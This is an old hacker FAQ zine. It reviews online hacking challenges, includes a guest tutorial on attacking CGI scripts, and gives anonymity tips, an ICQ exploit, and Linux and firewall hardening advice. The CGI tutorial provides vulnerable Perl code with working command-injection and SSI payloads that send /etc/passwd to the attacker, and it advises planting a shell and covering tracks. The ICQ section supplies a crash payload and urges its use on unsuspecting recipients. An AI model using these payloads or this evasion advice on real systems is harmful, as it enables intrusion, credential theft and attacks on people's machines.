Hack FAQ < Volume 7 > by Wang

Frequently asked questions about hacking and computers

Took a bit longer to get this volume out, been quite busy and updated a number of programs on the site. I have also been plugging away at the hacking challenges on the net - and starting on writing one myself for the Wang Products web site called "Mod-X". I had a couple of late requests for topics, so they haven't quite made it into this volume - but they will be written and included in Volume 8. Massive thanks must go out to Chawmp (General Chawmp of Cyberarmy) who wrote the Hacking CGI scripts topic below. Also, thanks to anyone else that has helped! Anyhow, enjoy :)

If you have any topics you want covering, please email me at Wang@most-wanted.com and I will consider putting them into the next volume, or you can fill in my online question form on the site. If you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously).

If you want to join our mailing list and be notified as soon as a new Hack FAQ is released, you can sign up by clicking here

Topics covered

Hacking Challenges

Hacking used to be something which was difficult to learn, and even more difficult to practise safely. With the introduction of the Internet, this has changed. Hackers can now freely exchange their knowledge without risk of being identified, and make themselves known to other hackers/hacking groups. The Internet has brought Hackers together...and given birth to many new opportunities. Recently, a lot of hacking challenges have appeared on the net - most inspired by the hacking challenge at Cyberarmy.com - Zebulun. I thought it would be nice to take a look at a couple of the best ones I have found - and hopefully get some of you lot to try them!

Explanation of ratings

All Ratings are out of 10.

Design is the rating for how good the idea behind the challenge is, and how good the graphics/layout of the challenge is

Features is the rating for what extra bits you can do in the challenge - e.g. message boards to talk to other hackers, challenge statistics, user rankings, special level privaleges etc.

Challenges covers how good the actual challenges are (suprisingly :) and how well thought out they. I also take into consideration how many different aspects of hacking are covered, and in what depth.

Difficulty is rated on how hard the challenges are, and how hard they get as you progress.

Zebulun
( http://www.cyberarmy.com/zebulun )

The original - Zebulun is still respected as the 'main' hacking challenge. I am not sure how it came to be, but Zebulun seems to be THE challenge to prove yourself one. It has the biggest user database of all the challenges we are looking at, and consists of different levels, each with its own challenge. As you go up the levels in Zebulun, you are awarded different ranks - e.g. Trooper, Captain etc., also you are given different privaleges at each level - e.g. being able to administer lower level message boards, being able to access other areas of the web site etc. The design of Zebulun is very slick, nice simple layouts, and loads of features. Each level has its own message board so you are able to talk with people on the same level, and improvements are constantly being made.

Challenges have been designed to test different aspects of hacking, and although there is one challenge per level - a challenge may require you to do a number of things. Challenges have been well designed to ensure that they are realistic enough for you to practise your skills on - but legally. For Zebulun, you will need to know a number of different topics, ranging from understanding basic javascript to finding and using exploits and encryption.

Design: 10

Features: 10

Challenges: 8

Difficulty: 8

Comments: Very professional, and packed full of features and level privaleges. Challenges are nicely thought out, but in places not very taxing. Some may argue that it is not testing a hackers ability at all, as it does not require a user to write a program of his own - in fact, little programming knowledge is required at all. Despite this, other areas are covered nicely.

Disavowed
( http://www.disavowed.net )

Disavowed takes a more hands on approach to the hacking challenge idea. There is no messing with 'ranks' or user registration. However...it comes out very nicely. The design is simple, and revolves around the idea that you are being initiated into joining a team of elite hackers. There are 3 stages - Easy, Medium, and Hard - each consists of 4 challenges. The 4 challenges on each stage are Java, Programming, Research, and Unix/www. At each stage you must complete the 4 challenges to proceed. After completing all 3 stages - you become a member of the team and the challenge changes to being far more complex!

Java looks at increasingly more difficult javascript protections, which you must find the password to. This teaches you to recognise 'easy' ways of breaking javascript protections - and to realise that they are not secure enough to protect pages. Programming sets you the task of making a program (in any language you choose) to find the solution to a problem. These problems range easy to damn hard! and even the best of programmers will find themselves having to think. Research is something which is pretty unique to disavowed.net, it requires you to find something out using the Internet. You will be given just enough information to get you started - and the rest will be up to your brain and your search engine of choice. Unix/www is designed to test your knowledge of unix and the Internet (suprisingly!), although possibly more the Internet than unix. Each stage also provides you with a message board to talk to others on the same level.

Design: 10

Features: 7

Challenges: 10

Difficulty: 10

Comments: Clever design using good imagery and storyline to make you work towards 'joining the team'. Challenges are very difficult, without good programming/Internet experience you would not get through. Perhaps, you could say there is less interaction than Zebulun - but it doesn't seem to matter. I feel it covers important aspects of hacking in great depth, and you will almost certainly come away having learnt something.

Arcanum
( http://www.arcanum.co.nz )

I have had a go at a number of small challenges that various people on Zebulun have made, and although some of them are quite fun - they never really make you want to go back. I thought that Trapper's challenge 'Arcanum' would be the same - but it suprised me. It is not complete yet (well, actually most of these challenges are still work in progress) but what I can see already is looking good. At the moment, the design echo's Zebulun quite closely (colour schemes, fonts etc.) but I have a feeling it will develop its own feel later.

There are 5 levels at this point in time, and each level consists of 4 challenges. The 4 challenges are each level are Logic, Programming, Encryption, and Unknown. Logic challenges are basically brain teasers, or mental challenges. It will give you a problem (usually mathematical) and ask you to solve it. This is the only challenge that I feel is a little weak, I personally don't see the point in it - and so far I have treated it as a second programming challenge. The problem is, it is too easy to write a simple program to solve the logic problems - admitadly there was one that you actually had to work out because a program wouldn't do it...but thats not really enough. The programming challenges are nice, they start off easy and gradually get to a hard level which really makes you think! The encryption is also nice, again starting from ridiculously easy algorithm's to much more complex ones. Unknown - from what I have seen so far is used to test your knowledge of many others aspects (like unix, www, cracking) and is a nice way to bring other aspects to the challenge. What is good about Arcanum is that you are awarded a star each time you complete a challenge on a level. On the members lists you can then see how many challenges on each level people have completed - which is a nice touch. Arcanum also provides a message board at each level to communicate with users on the same level.

Design: 7

Features: 8

Challenges: 8

Difficulty: 7

Comments: A nice little challenge, I can see this one progressing into something bigger. This challenge is not complete and at present level 5 is just going up. I did feel that up until level 4 the challenges were very simple, and I did wonder if they were going to get better - but level 4/5 there seems to be a jump in the difficulty and things get quite interesting. A good start!

Hacking CGI Scripts ( Written for Hack FAQ by Chawmp )

***********************   by Chawmp (Tom McIntyre)
* - Hacking CGI   - *   homepage: http://home.cyberarmy.com/chawmp
* - Version 1.01c - *   email: tom@holodeck.f9.co.uk
***********************   ICQ: 2724168

Introduction
-------------------

CGI programs are a major source of security holes. On a typical site the server and config files may be secure, but if CGI programs are not meticulously checked before they are used then serious security flaws can often be uncovered.

If at any time you are having difficulty, see the Notes section near the bottom of this document.

CGI basics
========

The letters "CGI" stand for "Common Gateway Interface". CGI is a way to add flexibility to websites by providing a mechanism for programs to be executed on the server (sometimes with input from the user on the client-side), and for their output to be displayed back to the client (or just logged somewhere on the server for later inspection). These programs can be written in any language, but by far the most common is perl. Perl is ideal for handling text-based input easily, so it's the language of choice for many CGI developers. Usually the term "CGI script" actually refers to "perl script".

What makes a CGI program dangerous?
================================

There are, for example, several places where CGI programs are made available for free. If you downloaded a set of perl scripts from a site such as this you would probably expect them to be bug-free and install them without a second thought. There are also the problems of time and operator competence. Most people don't have the time or the knowledge to go through a 5000-line bulletin board script to find that single vulnerable statement. This isn't just limited to free scripts though. Some very high-profile professional script-packages have recently been found to be vulnerable to attack.

Preparation
==========

If you know what script a site is using and it's freely available, get it! By examining the code and playing with it on your own system you'll be able to find holes a lot more easily than by just guessing. And your failed attempts won't be noticed by the server administrator.

Methods of attack
==============

Insecure shell calls
------------------------------

This applies to CGI programs written in many languages, but most commonly perl. If the program does not treat user input carefully there is a risk that a malicious user may craft it to be processed by the program in a dangerous way.

Consider this example. The classic vulnerable "mail" script, for example a feedback form. A website visitor is asked for comments that will be sent to the webmaster's email address by a script running on the server.

-- vuln1.html - The submission form -- <html> Thankyou for visiting my site. Please submit your comments and suggestions here: <br> <form action="/cgi-bin/vuln1.pl" method="GET"> <input type="hidden" name="address" value="webmaster@vulnerable.com"> <textarea name="comments" rows=10 cols=40></textarea> <br> <input type="submit"> </form> </html> -- EOF -- -- vuln1.pl - The vulnerable perl script -- #!/usr/bin/perl # Output will be an html page print "Content-type: text/html\n\n"; # Get input from form into the @pairs array @pairs = split(/&/, $ENV{'QUERY_STRING'}); # For each name/value pair in the array foreach $pair (@pairs) { # Split the pair into their own variables ($name, $value) = split(/=/, $pair); # Convert the form-encoding back $name =~ tr/+/ /; $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ tr/+/ /; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; # Store the destination email address and comments in variables if ($name eq "address") { # Store the destination email address $address = $value; } elsif ($name eq "comments") { # Store the comments $comments = $value; } } # At this point $address holds the address specified on the form, and # $comments holds the user's comments. # --- "Active" part # See discussion for details of this part open(MAIL,"| /bin/mail $address"); print MAIL "$comments"; close(MAIL); # --- End of "active" part # Print output for the user print <<EOT; <html> Thanks for your comments :) </html> EOT -- EOF --

There are two files in the above example. The html file that takes the input from the user, and the vulnerable perl script. If you don't know perl then you don't need to try to understand how most of it works. Just know that the destination email address (as specified by a hidden form element in the html page) and the comments (from the textarea) are stored, and passed to the mail program inside the "active" part.

In perl the open function is used to open a file, or more importantly here, a pipe. In this case a pipe to the command "/bin/mail webmaster@vulnerable.com" is opened and the comments are written to it, causing them to be emailed to the webmaster.

Look at what's happening here. The "/bin/mail webmaster@vulnerable.com" command is produced by starting /bin/mail with the address specified by the html page. If a malicious user was to save a copy of the html locally, and modify it by changing the lines

<form action="/cgi-bin/vuln1.pl" method="GET">
<input type="hidden" name="address" value="webmaster@vulnerable.com">

to these:

<form action="http://www.vulnerable.com/cgi-bin/vuln1.pl" method="GET">
<input type="hidden" name="address" value="hacker@root.com">

The action must now contain the complete URL since the html no longer resides on the server, and the email address has been replaced with your own. Now the comments will be sent to your email address.

Now, what would happen if you were to change the email address part to this?

value="hacker@root.com;mail hacker@root.com < /etc/passwd"

Inside the script this email address would translate to the command

"/bin/mail hacker@root.com;mail hacker@root.com < /etc/passwd"

causing the password file to be mailed to your address :)

(Note: I use /etc/passwd in examples throughout this document, but it is only for example purposes. Nowadays this file has limited value to an intruder as on modern systems the passwd file will not contain the actual password hashes).

If you find that the script filters the ; character, you can always try the | character, or \n (a newline), as these both cause another command to be executed in a line. Bear in mind that using | will cause the output of the first command to be fed into the second (won't usually matter), and that to send a newline character over the web you must encode it as %0a. So the address part could now be

value="hacker@root.com%0amail hacker@root.com < /etc/passwd"

Insecure use of SSI
-------------------------------

SSI means "Server Side Includes". These are instructions that can be placed in html files that are parsed by the server when the page is requested to give on-the-fly information. These pages are normally given the extension .shtml (or some shorter version), but this depends on the setup of the server. On some servers, all html documents are parsed. All includes take the form:

"<!--#"<tag><whitespace><parameters>[<whitespace>]"-->".

Here are some examples:

<!--#echo var="DATE_GMT" --> Prints the current date
<!--#include virtual="/ssi/header.html" --> Includes a common header section
<!--#exec cmd="uptime" --> Displays the system's uptime

There's a lot more you can do with SSI - take a look around on the net for more.

If you could add your own SSI to a file that is parsed by the webserver, you would be able to execute commands, include files, etc. Many CGI programs do not take this into account. Here's an example:

-- vuln2.shtml - A public comments page -- <html> <!--#include virtual="/ssi/header.html" --> Thankyou for visiting my site. Please submit your comments and suggestions here: <br> <form action="/cgi-bin/vuln2.pl" method="GET"> <textarea name="comments" rows=10 cols=40></textarea> <br> <input type="submit"> </form> <hr> Here's what other people have had to say: <hr> <!--begin--> <!--#include virtual="/ssi/footer.html" --> </html> -- EOF -- -- vuln2.pl - The vulnerable perl script -- #!/usr/bin/perl # Define the location of the page to be updated # Change this to the location of vuln2.shtml if you're trying this out $pagename = "/home/web/html/vuln2.shtml"; # Print content-type header print "Content-type: text/html\n\n"; # Get input from form into the @pairs array @pairs = split(/&/, $ENV{'QUERY_STRING'}); # For each name/value pair in the array foreach $pair (@pairs) { # Split the pair into their own variables ($name, $value) = split(/=/, $pair); # Convert the form-encoding back $name =~ tr/+/ /; $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ tr/+/ /; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; # Store the comments in a variable if ($name eq "comments") { # Store the comments $comments = $value; } } # At this point $comments holds the user's comments. # Separate each comment in the output file $comments .= "\n<hr>\n"; # --- "Active" part # Open the file for read/write open(FILE,"+<$pagename") || (print("Cannot open file!\n") && exit); # Lock the file to prevent other processes opening it flock(FILE, 2); # Read the file into the @list array @list = <FILE>; # Search through the array and insert the comments just before the # <!--begin--> line $linenum = 1; foreach $line (@list) { if ($line =~ /^<!--begin-->/) { $linenum--; splice(@list, $linenum, 0, $comments); last; } $linenum++; } # Write the array back to the file seek(FILE,0,0); truncate(FILE,0); foreach $line (@list) { print FILE $line; } # Close the file close(FILE); # --- End "active" part # Print output for the user print <<EOT; <html> Thanks for your comments. Click <a href="/vuln2.shtml">here</a> to return to the comments page :) </html> EOT -- EOF --

These two files comprise a simple guestbook. You can see that the .shtml file uses SSI to display a common header and footer (using the include directive). When this file is sent to the browser the include directives will be replaced by the contents of the appropriate files. Note that the <!--begin--> in the .shtml file is merely marking where the next comment should be inserted. It should not be confused with an SSI directive, as these all start <!--#.

Since this is such a simple script it doesn't do any input validation. If this was a normal html page you would be able to insert html, including javascript, into the page. Because it's SSI-enabled, try entering something like the following in the comments box:

<!--#exec cmd="cat /etc/passwd" -->

Now, when you go back to the comments page you'll see the password file :)

(Note: The file will appear to be one long line - this is simply because html doesn't insert line breaks at newlines. Use your browser's "view source" function to get a more readable output).

This is ideal. However, some server admins disable the exec directive to prevent this type of attack. In this case the best you can do is use the include directive to include the contents of a file whose location you know, such as a password database file that is not available via the web with your current access rights, but still within the web root. Note that some files (such as CGI scripts) will not have their source included by using an include directive. From an intruder's point of view, the include directive has limited value, and without exec there isn't always much you can do.

Buffer overflow
------------------------

This applies to CGI programs written in languages such as C. If the program does not validate its input properly a malicious user could overflow a buffer in the program to execute arbitrary code on the server. Since buffer overflows are beyond the scope of this article I won't go into any more detail, but information on this kind of attack is available to anyone who searches for it. A good article to read to get started with buffer overflows is "Smashing The Stack For Fun And Profit" in Phrack 49. Look it up. :)

What to do once you're in
=====================

First of all, don't pull an rm -Rf / . If you take note of anything I say, it should be that damaging sites is lame. Other than that, you have to make the decision whether what you're about to do is reasonable or not. Remember, unless you know what you're doing (which you probably don't since you're reading this) and you try anything stupid you'll get caught. One thing you might want to do is report the vulnerability. Mail the server admin and let them know - if they're a reasonable person they'll fix the hole, and you'll make a new friend :) If the hole is in a widely-distributed CGI program, report it to the creators so that it can be fixed for future versions, and current users can be warned.

Presumably you're trying to break into the site for a reason - to get access to files, etc. Do what you want and come back out. And if you don't want to get noticed, clean up after yourself. In the above example, instead of just causing the password file (assuming it was your target file) in the page for everyone to see, you could write a bit of perl code to spawn a shell on the server, or provide a form interface in another file for easy access to further commands. After setting up something like this, try to put the original file back the way you found it, and chances are you won't get noticed for longer.

Notes
=====

In this document I use UNIX-style path and filenames. Most of the ideas I've discussed here work exactly the same under NT and other platforms, it's just that I wrote these examples on a Linux system.

When you execute commands on the system, you do so with the rights of the user/ group the webserver runs as, which is usually nobody/nobody. This is enough access for complete control over the files the webserver uses though.

I use perl scripts here for example purposes. If you don't know perl you only really need to pay attention to the sections marked '"active" part', as these are the sections that contain the vulnerable code.

If you're testing these files out for yourself, make sure you set the file/pathnames correctly, and remember to chmod your cgi scripts 755 so that they are executable, and that you have specified the correct path to perl on your system in the first line of each script. Also, in the SSI example, you will need to chmod vuln2.shtml 777 since that file gets written to by the script.

These scripts are just simple examples. Sometimes you have to do a little more work than this to get around filters, etc, but often it is possible. Experiment.

For more info email or ICQ me (details at the top), or drop by my website to see if this file has been updated.

Further information
================

There are a few articles out there. p41mit0 recommended this one:

http://www.phreedom.org/en/issues/Phm23%20-%20Jordan%20Dimov%20-%20Security%20Issues%20in%20Perl%20Scripts.txt

Greets
=====

Everyone in the CyberArmy - there are too many to mention :)

http://www.cyberarmy.com/zebulun - Come try our officers' challenge

EOF

Basics of remaining anonymous on the net

The Internet is a realm of information. Anyone can go online and find out about any subject that interests them...but how much can they find out about you?

The answer - more than you would think! Lets take a normal example...a friend sends you an address of a web site to go to, say www.example.com - and you go there. Now, the owner of the www.example.com can look in his server logs, and if he wanted to - determine the following things about you:

For proof that this is possible - go to http://www.anonymizer.com and look at what they know about you already! Visiting a web site is not the only way someone can get information about you though. Everytime you are on IRC, ICQ, AIM, Online gaming, Email etc. etc. you are giving away more information about yourself.

How is this possible??

Well, your computer is making a connection with the web site right? So, for that web site to send you information - it needs to know your IP address. Bang! it has your IP, which it can then convert to a hostname and see what ISP you are with.

The site needs to have information like your browser name and version, screen resolution, operating system etc. so that it knows how to correctly display the page for you. For example, some sites look very different in Netscape and Internet Exploder, so sometimes the site will have two version of the site - one for each. It will then perform a check on your computer to find which browser you are using, and then display the right version of the site. Useful huh? Well, the problem is - any site can get that information just simply because it wants to know more about you :)

Java/javascript also has commands and functions that will find out information about you, and cookies are a wealth of information to the web site owner.

Don't forget browser holes and exploits as well - if your outdated browser has an exploit, they may be able to exploit it and get more information.

What can I do to stop them finding out this information??

There are many different levels you can take this to...we will start off simple, and get more paranoid :)

Proxies

Ok, so proxies aren't strictly for making you more anonymous - but they do. Proxies are meant to be there to speed up your Internet connections. If you need to contact some site on the other side of the world - you will probably find it is a bit slow. So, instead you use a proxy. Your web site request goes through to the proxy (which will hopefully be located a bit closer to home, try and pick a proxy in your own country) which then checks its cache to see if any of its other users have accessed that page recently. If they have, it can then perform a simple file size check at the site (to make sure the page it has is still up to date) and if its ok, it can send it to you. And all that should take less time than you contacting the site yourself. So how are proxy servers anonymizing you say? Well think about it - do you actually make any contact with the web site? No...the proxy does it all for you. Therefore, the web site won't be able to get any information on you. There are some exceptions, as some proxies aren't completely anonymous (they may pass some data across to the site), but the way to check this is to use the proxy to go to a test page like the one at www.anonymizer.com or www.cyberarmy.com/lists/ amd see if they come up with your details, or the proxy servers details.

To get a proxy, you can either:

Also, there are different kinds of proxies for different kinds of Internet activity. For example, you can get HTTP proxies for web browsing, FTP proxies for accessing FTP servers, Socks proxies for telnet and IRC etc. etc.

These different proxies usually use different ports to each other. HTTP proxies are usually something like ports 8080, 8010, 1080, 80 and Socks usually use 3128, 1080.

To use a proxy in Netscape:

Go to: Edit - Preferences - Advanced - Proxies - Manual proxy configuration - View

Then type in the name and port number or your proxy.

To use a proxy in IE:

Go to: View - Internet Options - Connection - mark "Access the Internet using a proxy server".

At ADDRESS type the name of the server and at PORT type the port number, click on advanced button and mark "Use the same proxy server for all protocols".

Encryption

If you ever get your computer hacked by someone over the net, or someone hacks your email - they are going to be able to go through the private information. Encryption is a way of making your private files and emails un-readable to anyone who doesn't know how to decrypt them. Obviously, some encryptions are trivial and can be cracked in minutes (caeser shifts, XOR encryptions, character substitutions etc.). However, there are encryptions out there that are very very strong. And you raverage script kiddie who breaks into your mail will not have a chance in hell of decrypting it.

For example, there is an encryption program on the site ( http://www.wangproducts.co.uk ) called Wcrypt - there is a dos version and a windows version, and you can use it to encrypt your files. It uses the strong Blowfish encryption. There are also special encryptions written with email in mind. PGP was described in hack faq 1. PGP is a public key encryption and it will allow people to send you encrypted emails which only you can decrypt. http://www.pgpi.com

Web based email accounts

Generally, web based email is good to use. You can sign up for a web based email account, and you don't really need to give them any personal details. http://www.hotmail.com is an example of a web based email service.

Ever been to http://www.hushmail.com ? They are an anonymous web based mail service. And they offer very strong email encryption as well. Basically, when you use your hushmail account to send a mail - your IP address is not included in the email headers (see hack faq 2 for a description of email headers) which means that the reciever of the mail can't trace you back to your ISP - they can only trace you back to hushmail. However, hushmail do not keep any details about you - so effectively you are anonymous. Also, the service is quite nice :)

Anonymous Remailers

When you use an anonymous remailer to send an email, the idea is that the email should not be traced back to you. Basically, your computer sends a mail to the remailer, and then the remailer sends the mail on to the recipient. In this process, your details are taken out of the email so it will not be traced back to you. It is also possible to send the email through multiple remailers. A typical (although each remailer may be different) email might be:

From: you@you.com
To: remailer@anonymous.com
Subject: This will be anonymous
::
Anon-To: recipient@recipient.com
blah blah blah

That would send an email from you@you.com through the remailer at remailer@anonymous.com to recipient@recipient.com . Don't forget the "::" - that tells the remailer that the Anon-To part is an address and not part of your message.

I can't really give you the names of any remailers as they go up and down all the time. However, if you do a search in a good search engine you are bound to find a few good ones.

Cookies

You may have heard people ranting about cookies, but what are they?, and why might you not want them?

When you visit a web site, it is entirely possible that the site could place a cookie on your computer. A cookie is basically a piece of information, stored in a file on your computer. These files are refered to as cookies, or cookie files. Basically, the site can put whatever they want in the cookie, and then access the cookie again when you next go back to the site.

Why do this you ask? Well, its simply for convienience. Ever logged into a web based email service - and then found that next time you go back there it automatically has your login name entered for you? or ever been to a web site which actually tells you how many times you have visited the page before? The site knows this because the information was stored on your computer. Netscape and IE both have facilities for cookies - and in both browsers you can turn cookies off using the options. However, you will suddenly realise how many web sites use cookies - and how many web sites get annoyed when they can't use cookies on you.

It may also be worth mentioning that some cookies are only present for the time that you have the browser open - these are generally used for security purposes, like when you login to your web based email, and then goto another site, and then go back to your mail - it might want to check the cookie to make sure you are the same computer that accessed the mail a short while ago. So think carefully before turning cookies off. I also believe that IE (and I think Netscape?) has the facility to ask you whether or not to accept the cookie each time a site tried to use one on you.

I am really paranoid - what can I do?

Ok - so you want to take it a stage further? Well, this is actually a good idea anyway. Here we go:

ICQ and HTML/Java fun

Just a really quick topic to keep along the lines of what we have already mentioned in this volume. HTML and java can be used for many evil purposes, and as a result of this - a lot of companies/programs filter html and java out of their products so that no-one can exploit them. For example, a number of message boards on the Internet filter java code from your message posts - why? because if they didn't, anyone could open a message and have some vicious java executed on them.

I thought ICQ would be a good program to talk about because another non-filtered html/java exploit has been uncovered in ICQ recently. ICQ provides its users with a "Greetings card" facility. This allows you to click on someone in your contact list, and send send them a greetings card (for whatever reason). Recently, it was found that you can include html/java code in a greetings card message - and ICQ doesn't filter it out. This means that when the recipient opens his greetings card, the html/java code will be executed...not the kind of greeting you were expecting!

For example:

Sending a greetings card with the following text in will crash the recipients computer (if they are using Windows 95/98)

<meta http-equiv="refresh" content="0; url=file://c:/con/con">

Basically the html meta tag above tells ICQ to redirect you to c:\con\con - which will crash a windows 95/98 machine. Alternatively, if you are getting bored of the con/con bug - you could use file://c:/aux/aux to make it more interesting for yourself :)

There are millions of nasty things you could do with html and java at your disposal - but I will leave that to you! I will also say that this exploit is not very well known so not many people will be suspicious of a greetings card - and also, a lot of people will have never received one before and are therefore bound to open it.

Basics of securing Linux

This is just a really basic topic that I thought needed covering. A few people have contacted me asking about Linux security. Its very difficult, you want to install Linux and get going with it - but by just installing it and going on the net...you are open to attack from hackers. And lets face it, one of the reasons for using Linux is to improve your security. To be even close to secure, you will need to know all the exploit history for your Linux distro, and have the patches for all of them. This does not cover securing a machine that is on a network. As a rule, no machine should be placed on any network prior to its having been secured against local and remote attacks. Quite a lot of this info was researched from other articles on securing Linux from the net.

Firstly...the securing of your Linux box should take place straight after installation - and definately before you go on the net for the first time.

Step 1 - Basic file permissions

Set more restrictive permissions on /root and /var/log

chmod -R og-rx /root
chmod -R o-rx /var/log
ulimit -c 0
/bin/touch /root/.rhosts /root/.netrc /etc/hosts.equiv
/bin/chmod 0 /root/.rhosts /root/.netrc /etc/hosts.equiv

Step 2 - Shut down services which are not required

This is very important. Services open ports on your computer - and open ports are potential ways for a hacker to penetrate your system.

The first thing to take a look at is the /etc/inetd.conf file. Most TCP and UDP services are initialized from this file.

-- sample inetd.conf section --

ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
#telnet stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#shell  stream  tcp     nowait  root    /usr/libexec/rshd       rshd
#login  stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind

-- sample inetd.conf section --
Any services preceded by a "#" are taken as commented out and will not be started at boot time.

Inetd is a daemon which listens for TCP or UDP connections, and on connection, passes control to the appropriate service. Becoming familiar with the /etc/inetd.conf file is a good idea, as it is a likely place that an intruder would put a backdoor.

So, after opening the file you will need to comment out (using '#') the services that you don't need. After commenting out unnecessary services inetd needs to be restarted so the changes just made will take effect.

Step 3 - Remove un-needed system users

Take a look at your /etc/passwd file, you will see that there are a lot of users on your system. Why do you want 'games' or 'guest' ? They will probably have no password too...good eh?

Remove these users with "userdel -r username" command.

Step 4 - Prevent lilo from booting in "Linux 1"

Here is what we said about "Linux 1" in hack faq volume 4:

At the lilo (linux loader) prompt type: linux 1

The system will boot up and you will be in a shell. Now type in 'passwd' and when prompted enter a new password and then re-type it to confirm. You can now reboot the system and login as 'root' with the password you choose!

Obviously we don't want people doing this to your 'secured' linux box - so here's how we stop that trick from working:

Open /etc/lilo.conf

Add the following lines:

restricted
password=somepassword

Just replace 'somepassword' with a password of your choice (make it a good one). Basically, this will make lilo ask for a password whenever someone tried to pass additional parameters to it, like "linux 1".

Next thing to do is secure the /etc/lilo.conf file a bit better so that people can't just log in with their guest accounts and change the password. At the shell, type the following:

chown root.root /etc/lilo.conf

chmod 600 /etc/lilo.conf

That will make sure that root is the owner of the file, and that the permissions are set more tightly.

Step 5 - Use a basic firewall

A firewall is essential if you plan to prevent remote attacks. Redhat Linux comes with a firewall called ipchains which can filter and redirect packets for you. Add these rules to /etc/rc.d/rc.local to provide you with basic security and logging.

/sbin/ipchains -F
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 53 -j DENY -l
/sbin/ipchains -A input -i eth0 -p udp -d 0.0.0.0/0 69 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 87 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 111 -j DENY -l
/sbin/ipchains -A input -i eth0 -p udp -d 0.0.0.0/0 111 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 2049 -j DENY -l
/sbin/ipchains -A input -i eth0 -p udp -d 0.0.0.0/0 2049 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 512 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 513 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 514 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 515 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 540 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 2000 -j DENY -l
/sbin/ipchains -A input -i eth0 -p udp -d 0.0.0.0/0 2000 -j DENY -l
/sbin/ipchains -A input -i eth0 -p tcp -d 0.0.0.0/0 6000 -j DENY -l

These rules block connections to certain services which cert says are bad and dangerous. If you are on a dialup, replace eth0 with ppp0.

Step 6 - Look at your logs

The logs on your system are your way of knowing what is, and has been going on. Logs are located in /var/log.

Step 7 - Check for updates regularly

You will need to visit the homepage of your Linux distro regularly to get all recommended patches and updates. This will ensure that any vulnerabilities in the software are patched quickly.

A better look at Firewalls

What is a Firewall?

I explained this very very briefly in Hack FAQ volume 1, so here is a better description. Firewalls are far more common now that they were a couple of years ago. This is largely due to the increased amount of Internet users worldwide, and therefore, the increased amount of hackers on the net. It is a well known fact that even now, around 50% of businesses on the net have no idea about Internet Security or how to secure their systems from attack. Personal Internet users are even worse, largely due to their ignorance over how open to the Internet they really are. In fact, quite a number of personal users don't take any security precautions because they don't think a hacker would have any reason to attack them. This is the worst attitude you could possibly have!

A firewall is a system or group of systems that control access between two networks. Think of a Firewall as a system based on rules. When data tries to pass from one network to another, the Firewall will halt the transfer and check its rules to see if that kind of data should be allowed to pass through the Firewall, and if the origin of the data is trusted. A Firewall can be very limited by its rules, and some will only allow email traffic through them, thereby protecting the network against any attacks other than attacks against the email service. Other firewalls provide less strict protections, and block services that are known to cause problems. The other good thing about a firewall is that it can be used as a tracing tool. By this, I mean it logs all illegal attempts to access your system or pass unauthenticated data to it. A typical log would probably hold the time/date, IP/Hostname of the attacker, protocol of attack, type of attack, traffic generated etc.

Firewalls are not your one-stop-security-solution though! A Firewall needs to be used as an extra precaution. For example, a firewall will not stop you running trojan attached to an email - or stop you from accidentally badly configuring a CGI script on your server. Ok, so you might complain that, although it wouldn't stop you infecting yourself with a trojan - once the trojan tried to send data over your net connection, the firewall would stop it and alert you. Trojans DO NOT like firewalls :) . Anyhow, all I am saying is that you can't just expect to install a Firewall and be 100% secure.

Ok...now - there are actually two types of Firewalls:

There is not a great deal of difference, especially with todays Firewall technology...but:

Application level

Application level firewalls generally are hosts running proxy servers, which permit no traffic directly between networks, and which perform elaborate logging and auditing of traffic passing through them. Since the proxy applications are software components running on the firewall, it is a good place to do lots of logging and access control. Application level firewalls are often fully transparent to the user, and tend to provide more detailed audit reports than network level firewalls.

Network Level

These operate using rules which state allowed source, destination addresses and ports in individual IP packets. One thing that's an important distinction about many network level firewalls is that they route traffic directly though them, so to use one you usually need to have a validly assigned IP address block. Network level firewalls tend to be very fast and tend to be transparent to users.

Do I need a Firewall?

The chances are you do. Even if you only go on the net occasionally to browse and check your mail - its better to be safe. If you have permanent connections, or run your own web server - then you most definately do need one! IRC users would also be wise to get one. The distinction comes when you need to decide what kind of protection you need. For most users (for surfing, checking email, IRC) you will probably only need a free Firewall or a very cheap one...but others may need to spend a bit more.

Can I get a Firewall?

Yes - you can even get one for free. As with most things, you will probably get what you pay for - so it is worth looking around before you decide which Firewall you are going to use to protect your personal computer. Generally, a personal Firewall should:

Some cheap personal Firewalls (for Win) you might want to check out are:

BlackICE Defender is a cheap personal Firewall that seems to be fairly popular amoungst net users. I have not tried this one myself, but I have heard pretty mixed reviews.

Conseal Private Desktop is a nice Firewall with a great interface, but its a bit more expensive than most.

Sygate Personal Firewall is a free personal Firewall, and what I did like about this one is that it is completely invisible (i.e. no icon in the system tray etc.) - but thats just me - maybe you would like one that shows up so you know its there :)

Zone Alarm is a free personal Firewall, which has got a lot of publicity and a lot of acknowledgement from net users. An easy to use Interface, and very little setup is involved.

Emails

Here are a few answers I have sent to individual people over the email recently:

How do I get information from a server that I telnet to, and does it matter what port I connect on?

Yes, the port you connect on will make all the difference. Each port is there for a different reason, and when you connect to a port a program (which is specific to that port) will run. These programs are usually reffered to as 'daemons'.

Each port is assigned for a different task, for example:

